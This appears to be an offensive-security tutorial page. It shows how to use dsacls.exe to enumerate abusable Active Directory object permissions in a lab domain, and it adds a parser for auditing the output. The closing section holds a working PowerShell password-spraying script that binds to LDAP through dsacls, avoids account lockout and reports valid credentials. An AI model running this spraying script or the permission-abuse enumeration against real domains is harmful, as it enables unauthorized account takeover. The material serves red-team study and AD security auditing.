# Enumerating AD Object Permissions with dsacls

It is possible to use a native Windows binary (in addition to the PowerShell cmdlet `Get-Acl`) to enumerate Active Directory object security permissions. The binary of interest is `dsacls.exe`.

Dsacls displays or modifies the permissions (ACLs) on Active Directory Domain Services (AD DS) objects.

## Execution

Let's check if user `spot` has any special permissions on the `spotless` user's AD object:

{% code title="attacker\@victim" %}

```powershell
dsacls.exe "cn=spotless,cn=users,dc=offense,dc=local" | select-string "spot"
```

{% endcode %}

Nothing useful:

![](/files/-LaN7itzG7az7P-wRr6s)

Let's give user `spot` the `Reset Password` and `Change Password` permissions on the `spotless` AD object:

![](/files/-LaN7_JUpqnM0gcxouwl)

...and try the command again:

{% code title="attacker\@victim" %}

```powershell
dsacls.exe "cn=spotless,cn=users,dc=offense,dc=local" | select-string "spot"
```

{% endcode %}

![](/files/-LaN7R50_E37uFhKaILH)

### Full Control

All the well-known (and abusable) AD object permissions can be looked for this way. One of them is `FULL CONTROL`:

{% code title="attacker\@victim" %}

```powershell
dsacls.exe "cn=spotless,cn=users,dc=offense,dc=local" | select-string "full control"
```

{% endcode %}

![](/files/-LaN9WENW2egvrpo8X9K)

### Add/Remove self as member

{% code title="attacker\@victim" %}

```powershell
dsacls.exe "cn=domain admins,cn=users,dc=offense,dc=local" | select-string "spotless"
```

{% endcode %}

![](/files/-LaNAHL_wSGsVIE5kfa3)

### WriteProperty/ChangeOwnerShip

![](/files/-LaNAksNf4H3bPs9BT0t)

Enumerating AD object permissions this way does not produce objects that can be piped between PowerShell cmdlets, but it is still worth keeping in mind if you do not have the ability to use tools like PowerView or the ActiveDirectory PowerShell cmdlets, or if you are trying to live off the land (`LOL`).

For more privileges that can be abused, see:
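One way around the "not pipeable" limitation, as an added example that is not part of the original page: a small parser that turns dsacls' text output into objects, so the ACEs can be filtered for audit (who besides the expected admins holds `FULL CONTROL` or `Reset Password`). The sample output is constructed to approximate dsacls' layout of `Allow|Deny <trustee>  <right>` lines followed by indented continuation lines; column widths on a real domain controller may differ.

```powershell
# Added example (not from the original page): parse dsacls text output into objects so it
# can be filtered like the output of Get-Acl or PowerView. Assumes dsacls' layout of
# "Allow|Deny <trustee>  <right>" ACE lines with indented continuation lines for extra rights.
function ConvertFrom-DsaclsOutput {
    param([Parameter(Mandatory)][string[]]$Lines)

    $aces = [System.Collections.Generic.List[object]]::new()
    foreach ($line in $Lines) {
        # ACE line: Allow/Deny, the trustee, two or more spaces, then the first right
        if ($line -match '^(Allow|Deny)\s+(.+?)\s{2,}(.+?)\s*$') {
            $aces.Add([pscustomobject]@{
                Type    = $Matches[1]
                Trustee = $Matches[2]
                Rights  = @($Matches[3])
            })
        }
        # Indented continuation line: another right belonging to the preceding ACE
        elseif ($aces.Count -gt 0 -and $line -match '^\s{10,}(\S.*?)\s*$') {
            $aces[$aces.Count - 1].Rights += $Matches[1]
        }
    }
    return $aces
}

# Constructed sample approximating "dsacls.exe cn=spotless,cn=users,dc=offense,dc=local"
$sample = @'
Owner: OFFENSE\Domain Admins
Group: OFFENSE\Domain Users

Access list:
Allow OFFENSE\Domain Admins                FULL CONTROL
Allow NT AUTHORITY\Authenticated Users     SPECIAL ACCESS
                                           READ PERMISSONS
                                           LIST CONTENTS
Allow OFFENSE\spot                         Reset Password
Allow OFFENSE\spot                         Change Password
Allow NT AUTHORITY\SELF                    Change Password
'@ -split "`r?`n"

$aces = ConvertFrom-DsaclsOutput -Lines $sample

# Audit view: anyone other than Domain Admins or SELF holding Full Control or Reset Password
$aces | Where-Object {
    $_.Trustee -notmatch 'Domain Admins|\\SELF$' -and
    ($_.Rights -contains 'FULL CONTROL' -or $_.Rights -contains 'Reset Password')
} | Format-Table Type, Trustee, @{ n = 'Rights'; e = { $_.Rights -join ', ' } }
```

On the constructed sample the audit view lists only `Allow OFFENSE\spot Reset Password`, which is exactly the ACE granted earlier on this page; on a live domain, feed `dsacls.exe "<dn>"` straight into `ConvertFrom-DsaclsOutput`.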

{% content-ref url="/pages/-LTx64XAYznr7BOWOADR" %}
[Privileged Accounts and Token Privileges](/offensive-security-experiments/active-directory-kerberos-abuse/privileged-accounts-and-token-privileges.md)
{% endcontent-ref %}

{% content-ref url="/pages/-LQimOasCuAaGC6hgChU" %}
[Abusing Active Directory ACLs/ACEs](/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces.md)
{% endcontent-ref %}

## Password Spraying Anyone?

As a side note, the `dsacls` binary could be used to do LDAP password spraying as it allows us to bind to an LDAP session with a specified username and password:

{% code title="incorrect logon" %}

```powershell
dsacls.exe "cn=domain admins,cn=users,dc=offense,dc=local" /user:spotless@offense.local /passwd:1234567
```

{% endcode %}

![Logon Failure](/files/-LaNCrJyr0IcdJ09FfvC)

{% code title="correct logon" %}

```powershell
dsacls.exe "cn=domain admins,cn=users,dc=offense,dc=local" /user:spotless@offense.local /passwd:123456
```

{% endcode %}

![Logon Successful](/files/-LaND3ClUvQm32WwdWmL)

### Dirty POC idea for Password Spraying:

{% code title="attacker\@victim" %}

```powershell
# NetBIOS domain name pulled from the "set u" environment listing (fragile: depends on variable ordering)
$domain = ((cmd /c set u)[-3] -split "=")[-1]
# PDC emulator: badPwdCount is not replicated, so the PDC is the authoritative place to read it
$pdc = ((nltest.exe /dcname:$domain) -split "\\\\")[1]
# Domain lockout threshold taken from "net accounts /domain" (line index depends on the output layout)
$lockoutBadPwdCount = ((net accounts /domain)[7] -split ":" -replace " ","")[1]
$password = "123456"

# (Get-Content users.txt)
"krbtgt","spotless" | % {
    # Current bad password count for this account, read from the PDC
    $badPwdCount = Get-ADObject -SearchBase "cn=$_,cn=users,dc=$domain,dc=local" -Filter * -Properties badpwdcount -Server $pdc | Select-Object -ExpandProperty badpwdcount
    # Only attempt a bind while the account stays safely below the lockout threshold
    if ($badPwdCount -lt $lockoutBadPwdCount - 3) {
        # dsacls binds to LDAP with the supplied credentials; a bad password yields "Invalid Credentials"
        $isInvalid = dsacls.exe "cn=domain admins,cn=users,dc=offense,dc=local" /user:$_@offense.local /passwd:$password | select-string -pattern "Invalid Credentials"
        if ($isInvalid -match "Invalid") {
            Write-Host "[-] Invalid Credentials for $_ : $password" -foreground red
        } else {
            Write-Host "[+] Working Credentials for $_ : $password" -foreground green
        }
    }
}
```

{% endcode %}

![](/files/-LaNQokIjU3XkqUj39tP)

## References

{% embed url="https://support.microsoft.com/en-gb/help/281146/how-to-use-dsacls-exe-in-windows-server-2003-and-windows-2000" %}
